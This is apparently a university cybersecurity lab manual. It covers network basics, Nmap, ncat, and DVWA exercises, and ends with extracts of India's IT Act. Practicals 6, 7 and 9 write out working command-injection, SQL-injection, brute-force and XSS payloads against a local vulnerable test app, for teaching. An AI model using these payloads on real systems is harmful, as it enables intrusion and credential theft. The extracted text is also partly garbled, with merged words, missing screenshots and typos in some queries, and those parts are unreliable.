Cyber Security Lab Manual
Cyber Security Lab Manual
& Technology
CYBER SCEURITY
(3150714)
5th SEMESTER
COMPUTER ENGINEERING
Laboratory Manual
DEPARTMENT OF COMPUTER ENGINEERING
VISION
To be recognized for the quality education and research in the field of Computer Engineering known
for its accomplished graduates.
MISSION
1. Continually improve the standard of our graduates by engaging in innovative teaching learning
methods with high caliber motivated faculty members keeping in-line with the rapid
technological advancements.
2. Promote and support research activities over a wide range of academic interests among students
and staff for growth of individual knowledge and continuous learning.
3. Provide an education system that promotes innovation, creativity, entrepreneurial spirit,
leadership as well as freedom of thought with emphasis on professionalism and ethical behavior.
PEO1: To provide fundamental knowledge of science and engineering for an IT professional and
to equip them with proficiency of mathematical foundations and algorithmic principles and inculcate
competent problem-solving ability.
PEO2: To implant ability in creativity & design of IT systems and transmit knowledge and
skills to analyze, design, test and implement various software applications.
PEO3: To exhibit leadership capability, triggering social and economical commitment and
inculcate community services.
PEO4: To inculcate professional-social ethics, teamwork in students and acquaint them with
requisite technical and managerial skills to attain a successful career.
I
PROGRAM OUTCOMES (POs)
Engineering Graduates will be able to:
II
engineering community and with society at large, such as, being able to comprehend and write
effective reports and design documentation, make effective presentations, and give and receive
clear instructions.
11. Project management and finance: Demonstrate knowledge and understanding of the
engineering and management principles and apply these to one’s own work, as a member and
leader in a team, to manage projects and in multidisciplinary environments.
12. Life-long learning: Recognize the need for, and have the preparation and ability to engage in
independent and life-long learning in the broadest context of technological change.
III
CYBER SECURITY PRACTICAL BOOK
DEPARTMENT OF COMPUTER
ENGINEERING PREFACE
It gives us immense pleasure to present the first edition of Cyber Security Practical Book for the
B.E. 3rd year students of Silver Oak College of Engineering and Technology.
The theory and laboratory course of Cyber Security, at Silver Oak College of Engineering
and Technology, Ahmedabad, is designed in such a manner that students can develop the
basic understanding of the subject during theory classes and gain the hands-on practical
experience during their laboratory sessions.
The Laboratory Manual presented here to you help you in understanding Topologies of
network,, security related network and understanding of different tools for different attacks on
security. It also take you in learning various hacking techniques. It will help you in learning
Linux programming which will be very useful programming language in Cyber Security.
Lab Manual Revised by: Prof. Shital Mehta, Silver Oak College of Engineering and
Technology
Technology
Technology
IV
CERTIFICATE
SHAIKH
This is to certify that Mr. ANNANAHMED with enrollment no.190770107264
180770107508 from
FURKANAHMED
V
VI
TABLE OF CONTENT
Sr
Practical Aim To From
No
1 2
1. To study about Basic concepts of Computer Networks. (Devices,
LAN, MAN & WAN)
2. To study about Network Topologies. 3 9
VI
I
PRACTICAL: 1
AIM: To study about Basic concepts of Computer Networks. (Devices, LAN, MAN & WAN,
O.S)
Introduction
LAN or Local Area Network connects network devices in such a way that personal computer and
workstations can share data, tools and programs. The group of computers and devices are connected
together by a switch, or stack of switches, using a private addressing scheme as defined by the
TCP/IP protocol. Private addresses are unique in relation to other computers on the local network.
Routers are found at the boundary of a LAN, connecting them to the larger WAN.
Data transmits at a very fast rate as the number of computers linked are limited. By definition, the
connections must be high speed and relatively inexpensive hardware (Such as hubs, network adapters
and Ethernet cables). LANs cover smaller geographical area (Size is limited to a few kilometres) and
are privately owned. One can use it for an office building, home, hospital, schools, etc. LAN is easy
to design and maintain. A Communication medium used for LAN has twisted pair cables and coaxial
cables. It covers a short distance, and so the error and noise are minimized.
Early LAN’s had data rates in the 4 to 16 Mbps range. Today, speeds are normally 100 or 1000 Mbps.
Propagation delay is very short in a LAN. The smallest LAN may only use two computers, while
larger LANs can accommodate thousands of computers. A LAN typically relies mostly on wired
connections for increased speed and security, but wireless connections can also be part of a LAN. The
fault tolerance of a LAN is more and there is less congestion in this network. For example: A bunch
of students playing Counter Strike in the same room (without internet).
Metropolitan Area Network (MAN) –
MAN, or Metropolitan area Network covers a larger area than that of a LAN and smaller area as
compared to WAN. It connects two or more computers that are apart but resides in the same or
different cities. It covers a large geographical area and may serve as an ISP (Internet Service
Provider). MAN is designed for customers who need a high-speed connectivity. Speeds of MAN
ranges in terms of Mbps. It’s hard to design and maintain a Metropolitan Area Network.
The fault tolerance of a MAN is less and also there is more congestion in the network. It is costly and
may or may not be owned by a single organization. The data transfer rate and the propagation delay of
MAN is moderate. Devices used for transmission of data through MAN are: Modem and Wire/Cable.
Examples of a MAN are the part of the telephone company network that can provide a high-speed
DSL line to the customer or the cable TV network in a city.
Wide Area Network (WAN) –
WAN or Wide Area Network is a computer network that extends over a large geographical area,
1
although it might be confined within the bounds of a state or country. A WAN could be a connection
of LAN connecting to other LAN’s via telephone lines and radio waves and may be limited to an
enterprise (a corporation or an organization) or accessible to the public. The technology is high speed
and relatively expensive.
There are two types of WAN: Switched WAN and Point-to-Point WAN. WAN is difficult to design
and maintain. Similar to a MAN, the fault tolerance of a WAN is less and there is more congestion in
the network. A Communication medium used for WAN is PSTN or Satellite Link. Due to long
distance transmission, the noise and error tend to be more in WAN.
WAN’s data rate is slow about a 10th LAN’s speed, since it involves increased distance and increased
number of servers and terminals etc. Speeds of WAN ranges from few kilobits per second (Kbps) to
megabits per second (Mbps). Propagation delay is one of the biggest problems faced here. Devices
used for transmission of data through WAN are: Optic wires, Microwaves and Satellites. Example of
a Switched WAN is the asynchronous transfer mode (ATM) network and Point-to-Point WAN is dial-
up line that connects a home computer to the Internet.
Os-:
An operating system (OS) is basically a collection of software that manages computer hardware
resources and provides common services for computer programs. Operating system is a crucial
component of the system software in a computer system.
Network Operating System is one of the important type of operating system.
Network Operating System runs on a server and gives the server the capability to manage data, users,
groups, security, applications, and other networking functions. The basic purpose of the network
operating system is to allow shared file and printer access among multiple computers in a network,
typically a local area network (LAN), a private network or to other networks.
Some examples of network operating systems include Microsoft Windows Server 2003, Microsoft
Windows Server 2008, UNIX, Linux, Mac OS X, Novell NetWare, and BSD.
Advantages
Centralized servers are highly stable.
Security is server managed.
Upgradation of new technologies and hardware can be easily integrated into the system.
It is possible to remote access to servers from different locations and types of systems.
Disadvantages
High cost of buying and running a server.
Dependency on a central location for most operations.
Regular maintenance and updates are required.
2
PRACTICAL: 2
Network Topology
Computer network topology is the way various components of a network (like nodes, links,
peripherals, etc.) are arranged. Network topologies define the layout, virtual shape or structure of
network, not only physically but also logically. The way in which different systems and nodes are
connected and communicate with each other is determined by topology of the network. Topology
can be physical or logical.
Physical Topology is the physical layout of nodes, workstations and cables in the network; while
logical topology is the way information flows between different components.
Bus Topology
Star Topology
Ring Topology
Mesh Topology
Tree Topology
1. Bus Topology
A signal from the source is broadcasted and it travels to all workstations connected to bus cable.
Although the message is broadcasted but only the intended recipient, whose MAC address or IP
address matches, accepts it. If the MAC /IP address of machine doesn’t match with the intended
address, machine discards the signal.
3
Aterminatorisaddedat endsofthecentralcable, topreventbouncingofsignals. Abarrelconnector can be
used to extend it. Below I have given a basic diagram of a bus topology and then have discussed
advantages and disadvantages of Bus Network Topology.
In Star topology, all the components of network are connected to the central device called “hub”
whichmaybeahub,arouteroraswitch.UnlikeBustopology(discussedearlier),wherenodeswere
connected to central cable, here all the workstations are connected to central device with a point-to-
point connection. So it can be said that every computer is indirectly connected to every other node
by the help of “hub”.
4
All the data on the star topology passes through the central device before reaching the intended
destination.HubactsasajunctiontoconnectdifferentnodespresentinStarNetwork,andatthesame
timeitmanagesandcontrolswholeofthenetwork.Dependingonwhichcentraldeviceisused,“hub”
canactasrepeaterorsignalbooster.Centraldevicecanalsocommunicatewithotherhubsofdifferent
network. Unshielded Twisted Pair (UTP) Ethernet cable is used to connect workstations to central
node.
Less damage in case of a single computer failure as it does not affect the entire network
Morecablesarerequiredtobeconnectedbecauseeachcomputerindividuallyconnectstothe central
server
Single point of failure in case the server letdown.
3. Ring Topology
In Ring Topology, all the nodes are connected to each-other in such a way that they make a closed
loop. Each workstation is connected to two other components on either side, and it communicates
with these two adjacent neighbors. Data travels around the network, in one direction. Sending and
receiving of data takes place by the help of TOKEN.
5
Token passing (in brief): Token contains a piece of information which along with data is sent by the
source computer. This token then passes to next node, which checks if the signal is intended to it. If
yes, it receives it and passes the empty to into the network, otherwise passes token along with the
data to next node. This process continues until the signal reaches its intended destination.
The nodes with token are the ones only allowed to send data. Other nodes have to wait for an empty
token to reach them. This network is usually found in offices, schools and small buildings.
Reducedchancesofdatacollisionaseachnodereleaseadatapacketafterreceivingthetoken.
Token passing makes ring topology perform better than bus topology under heavy traffic
No need of server to control connectivity among the nodes
Equal access to the resources
In Unidirectional Ring, a data packet must pass through all the nodes.
Ex:Let’ssayA,B,C,D,andEareapartoftheringnetwork.ThedataflowisfromAtowards
Bandhenceforth.Inthiscondition,ifEwantstosendapackettoD,thepacketmusttraverse the entire
network to reach.
Single point of failure that means if a node goes down entire network goes down.
4. Mesh Topology
6
In a mesh network topology, each of the network node, computer and other devices, are
interconnectedwithoneanother.Everynodenotonlysendsitsownsignalsbutalsorelaysdatafrom other
nodes. In fact a true mesh topology is the one where every node is connected to every other node in
the network. This type of topology is very expensive as there are many redundant connections, thus
it is not mostly used in computer networks. It is commonly used in wireless networks. Flooding or
routing technique is used in mesh topology.
a. Full Mesh Topology: - In this, like a true mesh, each component is connected to every other
component. Even after considering the redundancy factor and cost of this network, its main
advantage is that the network traffic can be redirected to other nodes if one of the nodes goes
down. Full mesh topology is used only for backbone networks.
b. PartialMeshTopology:-Thisisfarmorepracticalascomparedtofullmeshtopology.Here,some of the
systems are connected in similar fashion as in mesh topology while rests of the systems are
onlyconnectedto1or2devices.Itcanbesaidthatinpartialmesh,theworkstationsareindirectly
connected to other devices. This one is less costly and also reduces redundancy.
7
Provides security and privacy
5. Tree Topology
Tree Topology integrates the characteristics of Star and Bus Topology. Earlier we saw how in
PhysicalStarnetworkTopology,computers(nodes)areconnectedbyeachotherthroughcentralhub.
InTreeTopology,thenumberofStarnetworksareconnectedusingBus.Thismaincableseemslike a main
stem of a tree, and other star networks as the branches. It is also called Expanded Star Topology.
Ethernet protocol is commonly used in this type of topology. The diagram below will make it clear.
Scalable as leaf nodes can accommodate more nodes in the hierarchical chain.
A point to point wiring to the central hub at each intermediate node of a tree topology
represents a node in the bus topology
Other hierarchical networks are not affected if one of them gets damaged
8
Easier maintenance and faultfinding
6. Hybrid Topology
Hybrid, as the name suggests, is mixture of two different things. Similarly, in this type of topology
we integrate two or more different topologies to form a resultant topology which has good points
optimizing the available resources. Special care can be given to nodes where traffics high as well as
where chances of fault are high.
9
PRACTICAL: 3
Nmap is a tool used for port scanning. It scans the open ports in the target
host. Step 1: Install the nmap.exe.
Step 2: Start Nmap.
Following is the GUI of Nmap.
10
Put Screenshot of Choose the scan:
12
Ports:
Host Details:
13
PRACTICAL: 4
14
Put Screenshot of Choose the scan:
15
Ports:
16
PRACTICAL: 5
netcat = net+cat.
It is cat command over the network. Mostly used for file transfer over the network. Learn basic
unix/linux commands to understand working of this tool.
Step 1: Install the ncat. Sometimes it comes with nmap package so check it before installing a fresh
package.
17
Step 4: Goto the folder where ncat.exe is installed (in both the windows).
18
Here -l sets ncat to listen at port number 4444
Step 6: On the second cmd (client window) run the command: ncat.exe 127.0.0.1 4444
127.0.0.1 is the local ip address. The address of same PC, and 4444 is the port number where ncat is
listening. To practice the practical in the lab enter your neighbour's IP address, and choose any port
number greater than 1024.
Step 7: Now type the message which is to be sent on the server. As soon as you press the enter key,
the message is sent to the server and it is displayed on the server cmd window.
19
Step 8: Now the connection has made. To disconnect the connection press ctrl+c.
20
PRACTICAL: 6
2.Select "low"
3.Click Submit
21
Step 4: Command Execution.
22
Step 5: Execute Ping
1. Below we are going to do a simply ping test using the web interface.
2. As an example, ping something on your network.
3. Use the IP Address 192.168.1.106
4. Click Submit.
23
Attempt 1
24
Step 6: Bring up a terminal window.
1. cat /var/www/html/dvwa/vulnerabilities/exec/source/low.php.
2. Notice the two shell_exec lines.
3. These are the lines that execute ping depending on which Operating System is being used.
4. In Unix/Linux command, you can run multiple command separated by a ";".
5. Notice the code does not check that if $target matches an IP Address
6. \d+.\d+.\d+.\d+, where "\d+" represents a number with the possibility of multiple digits,
like 192.168.1.106.
7. The code allows for an attacker to append commands behind the IP Address.
8. 192.168.1.106; cat /etc/passwd
25
Step 7: Copy the /etc/passwd file to /tmp.
26
27
PRACTICAL: 7
28
29
Step 4: Select "SQL Injection" from the left navigation menu.
30
Step 5:
Input the below text into the User ID Textbox (See Picture).
%' or '0'='0 and click submit.
In this scenario, we are saying display all record that are false and all records that are true.
%' - Will probably not be equal to anything, and will be false.
'0'='0' - Is equal to true, because 0 will always equal 0.
31
Step 6:
Input the below text into the User ID Textbox (See Picture).
%' or 0=0 union select null, version() #.
Notice in the last displayed line, 5.1.60 is displayed in the surname.
This is the version of the mysql database.
32
Step 7: Display Database User
Input the below text into the User ID Textbox (See Picture).
%' or 0=0 union select null, user() #
Notice in the last displayed line, root@localhost is displayed in the surname.
This is the name of the database user that executed the behind the scenes PHP code
33
Step 8: Display all tables in information schema
Input the below text into the User ID Textbox (See Picture).
%' and 1=0 union select null, table name from information_schema. tables #
Click Submit
Now we are displaying all the tables in the information schema database.
The INFORMATION_SCHEMA is the information database, the place that stores
information about all the other databases that the MySQL server maintains.
34
Step 9: Display all the user tables in information schema.
Input the below text into the User ID Textbox (See Picture).
%' and 1=0 union select null, table name from information_schema.tables where table name
like 'user%'#
Click Submit
Now we are displaying all the tables that start with the prefix "user" in the information
schema database.
Step 10: Display all the columns fields in the information schema user table
Input the below text into the User ID Textbox (See Picture).%' and 1=0 union select null,
concept(table_name,0x0a,column_name) from information_schema.columns where table
name = 'users' #
Click Submit
Notice there are a user_id, first name, last name, user and Password column.
35
Step 11: Display all the columns field contents in the information_schema user table
Input the below text into the User ID Textbox (See Picture).
%' and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password)
from users #
Click Submit
Now we have successfully displayed all the necessary authentication information into this
database.
36
PRACTICAL: 8
A packet sniffer, sometimes referred to as a network monitor or network analyzer, can be used
byanetworkor system administrator to monitor and troubleshoot network traffic. Using the
information captured by the packet sniffer an administrator can identify erroneous packets and use
the data to pinpoint bottlenecks and help maintain efficient network data transmission.
In its simple form a packet sniffer simply captures all of the packets of data that pass through given
network interface. By placing packet sniffer on networking promiscuous mode, a malicious intruder
can capture and analyze all of the network traffic.
This is basically a network protocol analyzer –popular for providing the minutest details about your
network protocols, packet information, decryption etc. It can be used on Windows, Linux, OS X,
Solaris, FreeBSD, NetBSD, and many other systems. The information that is retrieved via this tool
can be viewed through a GUI, or the TTY-mode TShark utility. You can get your own free version
of the tool from here.
37
2. Select interface: Got capture option in menu bar and select interface
38
39
3. Start Capturing
40
PRACTICAL: 9
Intrusion of websites is illegal in many countries, so you cannot take other’s web sites as your testing
target.
First, you need build a test environment for yourself. If you are not good at building servers, we
recommend you build a simple one with XAMPP.
OS: Windows 7, 8
Software: XAMPP for Windows, download:
https://www.apachefriends.org/zh_cn/index.html
XAMPP for Windows has modules such as Apache, PHP, Tomcat, and MySQL etc. The default
installation path is c:\xampp, please do not change it.
Take DVWA (Damn Vulnerable Web Application) as an example, Start Apache and MySQL, and
41
access with http://127.0.0.1 .
After started, you can use the following command to set the password to 123456 (This is a weak
password, just for example, please modify it)
C:\xampp\mysql\bin\mysqladmin -u root password 123456
Now, you can download DVWA from https://github.com/RandomStorm/DVWA , unzip it to
C:\xampp\htdocs\dvwa,
Then modify its configuration file, which is
C:\xampp\htdocs\dvwa\config\config.inc.php:
$_DVWA[ 'db_server' ] = 'localhost';
$_DVWA[ 'db_database' ] = 'dvwa';
$_DVWA[ 'db_user' ] = 'root'
$_DVWA[ 'db_password' ] = ‘123456’;
$_DVWA['default_security_level']=" low";
Open http://127.0.0.1/dvwa/setup.php
Click” Create/Reset Database” to finish the installation.
Access the front page of it and it will redirect to
http://127.0.0.1/DVWA/login.php
42
2. DVWA Brute Force
The first challenge of DVWA is how to login it. Usually, you can search the network and get the
default username/password, or try to use SQL Injection to escape the authentication mechanism, such
as use a username like admin’;-- or other ways.
Here we will use brute force, and use WebCruiser Web Vulnerability Scanner 3
(http://www.janusec.com/ ) as a brute force tool.
First, input any username and password, such as 123, 456, etc. submit.
43
We found there was a request list which includes requests we submit just now. Note that there is a
button “Bruter”, click it, it will switch to Bruter tool.
The username and password field has been identified automatically.
The dictionary files are located in the same directory with WebCruiserWVS.exe and supports custom
modifying.
Click “Go” to start guess process, result will be list in the window.
Log in with the username and password.
3. SQL Injection
Select “SQL Injection” menu, input 1 and submit:
44
Input 1’ to try:
But we found it is not the same as expected, SQL Injection with integer type was ruled out. Continue
try with 1' and '1'='1 and 1' and '1'='2
45
46
There is no result return to us when we input 1’ and ‘1’=’2
Till now, we can adjudge there is SQL Injection vulnerability with string type here. Recap:
Criterion of SQL Injection
Assume the initial response is Response0, Response by append true logic is Response1, Response by
append false logic is Response2,
47
If Response1= Response0, but Response1! = Response2, SQL Injection exists. OK, can you takeover
some data by exploiting it?
Try: http://127.0.0.1/dvwa/vulnerabilities/sqli/?Submit=Submit&id=1' and (select 1 from ( select
count(*),concat((select database()),0x3a,floor(rand(0)*2)) x from information_schema.tables group
by x)a)%23
48
49
50
The ASCII of the first byte is 100, it is d, and so on.
http://127.0.0.1/dvwa/vulnerabilities/sqli/?Submit=Submit&id=1' and (select
sord(substr(database(),2,1)) )=118 and %271%27=%271 , the second byte is v .
http://127.0.0.1/dvwa/vulnerabilities/sqli/?Submit=Submit&id=1' and (select
ord(substr(database(),3,1)) )=119 and %271%27=%271 ,the third byte is w .
http://127.0.0.1/dvwa/vulnerabilities/sqli/?Submit=Submit&id=1' and (select
ord(substr(database(),4,1)) )=97 and %271%27=%271 ,the fourth byte is a . Got the full name of
database is “dvwa” .
Is there a tool which can do these tests instead?
Yes, we can use a web application security scanner to do it.
Take WebCruiser as an illustration, navigate page and click “ScanURL”:
51
SQL Injection vulnerabilities found. Right click vulnerability and select “SQL INJECTION POC”,
Continue click ”Get Environment Information”:
52
4. XSS
Select XSS from the menu, http://127.0.0.1/dvwa/vulnerabilities/xss_s/
Input text and script directly in the title and content field, such as:
testinput<img src=0 onerror="alert(123456)"> Or use scanner, it found 2 XSS vulnerabilities.
53
Note: In order to improve efficiency, WebCruiser Web Vulnerability Scanner can scan designated
vulnerability type (setting) or designated URL (ScanURL button) separately.
54
PRACTICAL: 10
An Act to provide legal recognition for transactions carried out by means of electronic data
interchange and other means of electronic communication, commonly referred to as "electronic
commerce", which involve the use of alternatives to paper-based methods of communication and
storage of information, to facilitate electronic filing of documents with the Government agencies.
If any person without permission of the owner or any other person who is in charge of a computer,
computer system or computer network, —
(a) Accesses or secures access to such computer, computer system or computer network;
(b) Downloads, copies or extracts any data, computer data base or information from such computer,
computersystemorcomputernetworkincludinginformationordataheldorstoredinanyremovable storage
medium;
(c) Introduces or causes to be introduced any computer contaminant or computer virus into any
computer, computer system or computer network;
(d) damages or causes to be damaged any computer, computer system or computer network, data,
computer data base or any other programmer residing in such computer, computer system or
computer network;
(e) Disrupts or causes disruption of any computer, computer system or computer network;
(f) Denies or causes the denial of access to any person authorized to access any computer, computer
system or computer network by any means;
(g) providesanyassistancetoanypersontofacilitateaccesstoacomputer,computersystemor
55
computer network in contravention of the provisions of this Act, rules or regulations made
thereunder;
(h) chargestheservicesavailedofbyapersontotheaccountofanotherpersonbytamperingwithor
manipulatinganycomputer,computersystem,orcomputernetwork,heshallbeliabletopaydamages by
way of compensation not exceeding one crore rupees to the person so affected. Explanation.- For
the purposes of this section,—
(i) "Computer contaminant" means any set of computer instructions that are designed—
(a) To modify, destroy, record, transmit data or Programmed residing within a computer, computer
system or computer network; or
(b) By any means to usurp the normal operation of the computer, computer system, or computer
network;
(ii) "computer data base" means a representation of information, knowledge, facts, concepts or
instructionsintext,image,audio,videothatarebeingpreparedorhavebeenpreparedinaformalized manner
or have been produced by a computer, computer system or computer network and are intended for
use in a computer, computer system or computer network;
(iii) "computervirus"meansanycomputerinstruction,information,dataorProgrammethatdestroys,
damages, degrades or adversely affects the performance of a computer resource or attaches itself to
another computer resource and operates when a Programmed, data or instruction is executed or
some other event takes place in that computer resource;
(iv) "Damage" means to destroy, alter, delete, add, modify or rearrange any computer resource by
any means.
If any person who is required under this Act or any rules or regulations made thereunder to—
(a) furnishanydocument,returnorreporttotheControlleror?heCertifyingAuthorityfailstofurnish
56
the same, he shall be liable to a penalty not exceeding one lakh and fifty thousand rupees for each
such failure;
(b) File any return or furnish any information, books or other documents within the time specified
therefor in the regulations fails to file return or furnish the same within the time specified therefore
theregulations,heshallbeliabletoapenaltynotexceedingfivethousandrupeesforeverydayduring which
such failure continues;
(c) Maintain books of account or records, fails to maintain the same, he shall be liable to a penalty
not exceeding ten thousand rupees for every day during which the failure continues.
52. Salary, allowances and other terms and conditions of service of Presiding Officer.
The salary and allowances payable to, and the other terms and conditions of service including
pension, gratuity and other retirement benefits of. The Presiding Officer of Cyber Appellate
Tribunal shall be such as may be prescribed: Provided that neither the salary and allowances nor the
other terms and conditions of service of the Presiding Officer shall be varied to his disadvantage
after appointment.
No court shall have jurisdiction to entertain any suit or proceeding in respect of any matter which
an adjudicating officer appointed under this Act or the Cyber Appellate Tribunal constituted under
this Act is empowered by or under this Act to determine and no injunction shall be granted by any
court or other authority in respect of any action taken or to be taken in pursuance of any power
conferred by or under this Act.
Any person aggrieved by any decision or order of the Cyber Appellate Tribunal may file an appeal
to the High Court within sixty days from the date of communication of the decision or order of the
Cyber Appellate Tribunal to him on any question of fact or law arising out of such order Provided
that the High Court may, if it is satisfied that the appellant was prevented by sufficient cause from
filingtheappealwithinthesaidperiod,allowittobefiledwithinafurtherperiodnotexceedingsixty
57
days.
ApenaltyimposedunderthisAct,ifitisnotpaid,shallberecoveredasanarrearoflandrevenueand
thelicenseortheDigitalSignatureCertificate,asthecasemaybe,shallbesuspendedtillthepenalty is paid.
Explanation.—for the purposes of this section, "computer source code" means the
Listingofprogrammer,computercommands,designandlayoutandProgrammeanalysisofcomputer
resource in any form.
(1) Whoever with the intent to cause or knowing that he is likely to cause wrongful loss or damage
to the public or any person destroys or deletes or alters any information residing in a computer
resource or diminishes its value or utility or affects it injuriously by any means, commit shack:
(2) Whoever commits hacking shall be punished with imprisonment up to three years, or with fine
which may extend up to two lakh rupees, or with both.
Whoever publishes or transmits or causes to be published in the electronic form, any material which
islasciviousorappealstotheprurientinterestorifitseffectissuchastotendtodepraveandcorrupt
personswhoarelikely,havingregardtoallrelevantcircumstances,toread,seeorhearthematter
58
contained or embodied in it, shall be punished on first conviction with imprisonment of either
description for a term which may extend to five years and with fine which may extend to one lakh
rupeesandintheeventofasecondorsubsequentconvictionwithimprisonmentofeitherdescription for a
term which may extend to ten years and also with fine which may extend to two lakh rupees.
(1) TheControllermay,byorder,directaCertifyingAuthorityoranyemployeeofsuchAuthorityto
takesuchmeasuresorceasecarryingonsuchactivitiesasspecifiedintheorderifthosearenecessary to
ensure compliance with the provisions of this Act, rules or any regulations made thereunder.
(1) If the Controller is satisfied that it is necessary or expedient so to do in the interest of the
sovereignty or integrity of India, the security of the State, friendly relations with foreign Stales or
public order or for preventing incitement to the commission of any cognizable offence, for reasons
toberecordedinwriting,byorder,directanyagencyoftheGovernmenttointerceptanyinformation
transmitted through any computer resource.
(2) The subscriber or any person in charge of the computer resource shall, when called upon by any
agencywhichhasbeendirectedundersub-section(1),extendallfacilitiesandtechnicalassistanceto
decrypt the information.
(1) The appropriate Government may, by notification in the Official Gazette, declare that any
computer, computer system or computer network to be a protected system.
(2) The appropriate Government may, by order in writing, authorize the persons who reauthorized
59
to access protected systems notified under sub-section (1).
Whoevermakesanymisrepresentationto,orsuppressesanymaterialfactfrom,theControllerorthe
Certifying Authority for obtaining any license or Digital Signature Certificate, as the case may be.
Shall be punished with imprisonment for a term which may extend to two years, or with fine which
may extend to one lakh rupees, or with both.
Save as otherwise provided in this Act or any other law for the time being in force, any person who,
inpursuanceofanyofthepowersconferredunderthisAct,rulesorregulationsmadethereunder,has secured
access to any electronic record, book, register, correspondence, information, document or other
material without the consent of the person concerned discloses such electronic record, book.
Register, correspondence, information, document or other material to any other person shall be
punished with imprisonment for a term which may extend to two years, or with fine which may
extend to one lakh rupees, or with both.
73. Penalty for publishing Digital Signature Certificate false in certain particulars.
(a) The Certifying Authority listed in the certificate has not issued it; or
(b) The subscriber listed in the certificate has not accepted it; or
(c) The certificate has been revoked or suspended, unless such publication is for the purpose of
verifying a digital signature created prior to such suspension or revocation.
60
(2) Any person who contravenes the provisions of sub-section (1) shall be punished with
imprisonment for a term which may extend to two years, or with fine which may extend to one lakh
rupees, or with both.
Whoever knowingly creates, publishes or otherwise makes available a Digital Signature Certificate
for any fraudulent or unlawful purpose shall be punished with imprisonment for a term which may
extend to two years, or with fine which may extend to one lakh rupees, or with both.
(1) Subject to the provisions of sub-section (2), the provisions of this Act shall apply also to any
offence or contravention committed outside India by any person irrespective of his nationality.
76. Confiscation.
Anycomputer,computersystem,floppies,compactdisks,tapedrivesoranyotheraccessoriesrelated
thereto, in respect of which any provision of this Act. rules, orders or regulations made thereunder
hasbeenorisbeingcontravened,shallbeliabletoconfiscation:Providedthatwhereitisestablished to the
satisfaction of the court adjudicating the confiscation that the person in whose possession,
powerorcontrolofanysuchcomputer,computersystem,floppies,compactdisks,tapedrivesorany other
accessories relating thereto is found is not responsible for the contravention of the provisions of this
Act, rules, orders or regulations made thereunder, the court may, instead of making an order
forconfiscationofsuchcomputer,computersystem,floppies,compactdisks,tapedrivesoranyother
accessories related thereto, make such other order authorized by this Act against the person
contravening of the provisions of this Act, rules, orders or regulations made thereunder as it may
think fit.
61
77. Penalties or confiscation not to interfere with other punishments.
No penalty imposed or confiscation made under this Act shall prevent the imposition of any other
punishment to which the person affected thereby is liable under any other law for the time being in
force.
Notwithstanding anything contained in the Code of Criminal Procedure, 1973, a police officer not
below the rank of Deputy Superintendent of Police shall investigate any offence under this Act.
For the removal of doubts, it is hereby declared that no person providing any service as a network
service provider shall be liable under this Act, rules or regulations made thereunder for any third
party information or data made available by him if he proves that the offence or contravention was
committed without his knowledge or that he had exercised all due diligence to prevent the
commission of such offence or contravention.
(b) "Third party information" means any information dealt with by a network service provider in his
capacity as an intermediary;
62
Act Explanation.—For the purposes of this sub-section, the expression "public place" includes any
public conveyance, any hotel, any shop or any other place intended for use by, or accessible to the
public.
(2) Where any person is arrested under sub-section (1) by an officer other than a police officer, such
officer shall, without unnecessary delay, take or send the person arrested before a magistrate having
jurisdiction in the case or before the officer-in-charge of a police station.
(3) The provisions of the Code of Criminal Procedure, 1973 shall, subject to the provisions of this
section, apply, so far as may be, in relation to any entry, search or arrest, made under this section.
The provisions of this Act shall have effect notwithstanding anything inconsistent therewith
contained in any other law for the time being in force.
ThePresidingOfficerandotherofficersandemployeesofaCyberAppellateTribunal,theController, the
Deputy Controller and the Assistant Controllers shall be deemed to be public servants within the
meaning of section 21 of the Indian Penal Code.
The Central Government may give directions to any State Government as to the carrying into
execution in the State of any of the provisions of this Act or of any rule, regulation or order made
thereunder.
No suit, prosecution or other legal proceeding shall lie against the Central Government, the State
Government,theControlleroranypersonactingonbehalfofhim,thePresidingOfficer,adjudicating
officers and the staff of the Cyber Appellate Tribunal for anything which is in good faith done or
intended to be done in pursuance of this Act or any rule, regulation or order made thereunder.
63
85. Offences by companies.
(1) Where a person committing a contravention of any of the provisions of this Act or of any rule,
direction or order made thereunder is a company, every person who, at the time the contravention
was committed, was in charge of, and was responsible to, the company for the conduct of business
of the company as well as the company, shall be guilty of the contravention and shall be liable to be
proceeded against and punished accordingly:
Providedthatnothingcontainedinthissub-sectionshallrenderanysuchpersonliabletopunishment if he
proves that the contravention took place without his knowledge or that he exercised all due
diligence to prevent such contravention.
(2) Notwithstanding anything contained in sub-section (1), where a contravention of any of the
provisions of this Act or of any rule, direction or order made thereunder has been committed by a
company and it is proved that the contravention has taken place with the consent or connivance of,
orisattributabletoanyneglectonthepartof,anydirector,manager,secretaryorotherofficerofthe company,
such director, manager, secretary or other officer shall also be deemed to be guilty of the
contravention and shall be liable to be proceeded against and punished accordingly.
(i) "Company" means anybody corporate and includes a firm or other association of individuals; and
(1)IfanydifficultyarisesingivingeffecttotheprovisionsofthisAct,theCentralGovernmentmay,
byorderpublishedintheOfficialGazette,makesuchprovisionsnotinconsistentwiththeprovisions of this
Act as appear to it to be necessary or expedient for removing the difficulty:
Providedthatnoordershallbemadeunderthissectionaftertheexpiryofaperiodoftwoyearsfrom the
commencement of this Act (2) Every order made under this section shall be laid, as soon as may be
after it is made, before each House ofParliament.
64
65